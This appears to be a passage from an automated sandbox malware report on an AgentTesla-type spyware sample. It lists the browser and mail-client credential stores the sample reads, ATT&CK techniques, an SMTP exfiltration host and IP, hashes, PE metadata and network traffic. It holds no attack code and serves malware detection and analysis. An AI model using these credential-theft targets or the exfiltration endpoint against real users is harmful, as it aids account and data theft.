                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.275297805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.537735702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.274776016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.540034037.0000000007158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe PID: 6408, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6452, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6452, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe.42b6760.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.275647254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.275934725.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.275297805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.537735702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.274776016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.279564854.0000000004225000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.277476753.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.540034037.0000000007158000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe PID: 6408, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 6452, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    Path Interception312
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    221
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API
                    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Disable or Modify Tools
                    211
                    Input Capture
                    2
                    Process Discovery
                    Remote Desktop Protocol211
                    Input Capture
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)141
                    Virtualization/Sandbox Evasion
                    Security Account Manager141
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares11
                    Archive Collected Data
                    Automated Exfiltration1
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)312
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object Model1
                    Data from Local System
                    Scheduled Transfer11
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSH1
                    Clipboard Data
                    Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common3
                    Obfuscated Files or Information
                    Cached Domain Credentials114
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                    Software Packing
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe25%VirustotalBrowse
                    SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe29%ReversingLabsByteCode-MSIL.Spyware.Noon
                    SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe100%Joe Sandbox ML
                    No Antivirus matches
                    SourceDetectionScannerLabelLinkDownload
                    1.0.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    1.0.cvtres.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                    1.2.cvtres.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    1.0.cvtres.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    1.0.cvtres.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    1.0.cvtres.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    SourceDetectionScannerLabelLink
                    rematinvest.ro0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://mail.rematinvest.ro0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://rematinvest.ro0%Avira URL Cloudsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    https://api.ipify.org%0%URL Reputationsafe
                    http://CsSUlW.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    rematinvest.ro
                    109.99.162.14
                    truetrueunknown
                    mail.rematinvest.ro
                    unknown
                    unknownfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.rematinvest.rocvtres.exe, 00000001.00000002.540696407.00000000071E8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://127.0.0.1:HTTP/1.1cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://rematinvest.rocvtres.exe, 00000001.00000002.540696407.00000000071E8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%%startupfolder%cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      low
                      https://api.ipify.org%cvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      low
                      http://CsSUlW.comcvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwcvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://DynDns.comDynDNSnamejidpasswordPsi/Psicvtres.exe, 00000001.00000002.539795312.0000000007103000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      109.99.162.14
                      rematinvest.roRomania
                      9050RTDBucharestRomaniaROtrue
                      Joe Sandbox Version:35.0.0 Citrine
                      Analysis ID:671761
                      Start date and time: 22/07/202215:32:062022-07-22 15:32:06 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 19s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.19730 (renamed file extension from 19730 to exe)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@3/1@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 0.8% (good quality ratio 0.6%)
                      • Quality average: 58.4%
                      • Quality standard deviation: 29.4%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 68
                      • Number of non-executed functions: 20
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      15:33:21API Interceptor1x Sleep call for process: SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe modified
                      15:33:24API Interceptor860x Sleep call for process: cvtres.exe modified
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      RTDBucharestRomaniaRObMwvKA6Owe.exeGet hashmaliciousBrowse
                      • 109.102.255.230
                      kfHWoySTelGet hashmaliciousBrowse
                      • 109.99.173.28
                      home.mipsGet hashmaliciousBrowse
                      • 80.97.224.199
                      #Ud83d#Udd0a VM 9193408792.wav.htmlGet hashmaliciousBrowse
                      • 92.87.6.53
                      jTpjSXxHjt.dllGet hashmaliciousBrowse
                      • 92.81.66.155
                      oWmdf3W67o.dllGet hashmaliciousBrowse
                      • 109.103.48.81
                      djA1JX3UZv.dllGet hashmaliciousBrowse
                      • 92.83.238.161
                      342hs5UFG1.dllGet hashmaliciousBrowse
                      • 109.102.113.172
                      196608.htmGet hashmaliciousBrowse
                      • 92.87.6.53
                      fxyKXb2hV5.dllGet hashmaliciousBrowse
                      • 109.103.83.54
                      v8Rhp4teOl.dllGet hashmaliciousBrowse
                      • 92.85.58.229
                      7T2Y8w1zOi.dllGet hashmaliciousBrowse
                      • 92.83.239.195
                      E3mbtPKpoj.dllGet hashmaliciousBrowse
                      • 92.80.107.22
                      agsS7yP4eP.dllGet hashmaliciousBrowse
                      • 89.121.130.106
                      Vi3ioqKqPS.dllGet hashmaliciousBrowse
                      • 86.35.226.0
                      eYB6B0ahQe.dllGet hashmaliciousBrowse
                      • 92.81.231.56
                      196488.htmGet hashmaliciousBrowse
                      • 92.87.6.53
                      cutie.spcGet hashmaliciousBrowse
                      • 92.84.221.174
                      xd.arm7Get hashmaliciousBrowse
                      • 109.97.15.12
                      Sh4DuCY4DY.exeGet hashmaliciousBrowse
                      • 109.98.58.98
                      No context
                      No context
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):226
                      Entropy (8bit):5.3467126928258955
                      Encrypted:false
                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                      MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                      SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                      SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                      SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.4204493171592665
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      • Win32 Executable (generic) a (10002005/4) 49.97%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe
                      File size:368792
                      MD5:dc73208cea7efcb8980e4fe19695fb58
                      SHA1:2c2dcb6cb0c160be8ed8a44258c75c72490dc800
                      SHA256:3c9da266bec8653324cc74d991fe6707192843f196ba7a0007d1f2850501b24b
                      SHA512:6ccfe1d86e0ae4de76899a73515500428029ebfb476588c2d0939855aa51181e952fcaa86d530008b8ecfd9aa6aaf4aa5e73ebcb6b5f467ec4a11a03691b407c
                      SSDEEP:6144:ltKUcUfA/X0uQSF5iEAjhOiLp7/U13pLKqr2PtueCg/+rA:lYUE/zDF5iaiN7iKqr2PtueCo
                      TLSH:7E748CCD765031CFC897C976CAA84C75B6607867831B8223D09725EDAD4CAABDF181F2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._e.b..............0.................. ........@.. ...............................|....`................................
                      Icon Hash:0000000000000000
                      Entrypoint:0x43dbfe
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x62DA655F [Fri Jul 22 08:52:47 2022 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Signature Valid:false
                      Signature Issuer:CN=GlobalSign CodeSigning CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE
                      Signature Validation Error:The digital signature of the object did not verify
                      Error Number:-2146869232
                      Not Before, Not After
                      • 8/25/2020 6:42:07 AM 8/26/2023 6:42:07 AM
                      Subject Chain
                      • CN=win.rar GmbH, O=win.rar GmbH, L=Berlin, S=Berlin, C=DE
                      Version:3
                      Thumbprint MD5:185DBD4A2E2671589EEB3E7E1920EA9F
                      Thumbprint SHA-1:B3DF816A17A25557316D181DDB9F46254D6D8CA0
                      Thumbprint SHA-256:66DB1C86D38273627C837F4638122FA88BBFFFF31C4052115B98CAF6CE0C631E
                      Serial:731D40AE3F3A1FB2BC3D8395
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3dbb00x4b.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x19eea.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x562000x3e98
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3db680x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x3bc040x3be00False0.812638635177453data7.592349804617437IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x3e0000x19eea0x1a000False0.14594914362980768data1.780344215325864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x580000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x3e2540x120bPNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced
                      RT_ICON0x3f4600x10828dBase III DBT, version number 0, next free block index 40
                      RT_ICON0x4fc880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                      RT_ICON0x53eb00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                      RT_ICON0x564580x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                      RT_ICON0x575000x468GLS_BINARY_LSB_FIRST
                      RT_GROUP_ICON0x579680x5adata
                      RT_VERSION0x579c40x33cdata
                      RT_MANIFEST0x57d000x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      DLLImport
                      mscoree.dll_CorExeMain
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.3109.99.162.14497415872030171 07/22/22-15:33:30.362608TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49741587192.168.2.3109.99.162.14
                      192.168.2.3109.99.162.14497415872840032 07/22/22-15:33:30.362703TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249741587192.168.2.3109.99.162.14
                      192.168.2.3109.99.162.14497415872851779 07/22/22-15:33:30.362703TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49741587192.168.2.3109.99.162.14
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 22, 2022 15:33:29.849701881 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:29.895144939 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:29.895684004 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.007388115 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.010684013 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.056446075 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.057645082 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.105433941 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.121973038 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.172768116 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.174324036 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.219968081 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.220487118 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.305110931 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.314565897 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.315073967 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.361059904 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.361115932 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.362607956 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.362703085 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.370491028 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.370620966 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:30.408056021 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:30.415905952 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:34.302337885 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:34.529980898 CEST49741587192.168.2.3109.99.162.14
                      Jul 22, 2022 15:33:34.549921989 CEST58749741109.99.162.14192.168.2.3
                      Jul 22, 2022 15:33:34.550004959 CEST49741587192.168.2.3109.99.162.14
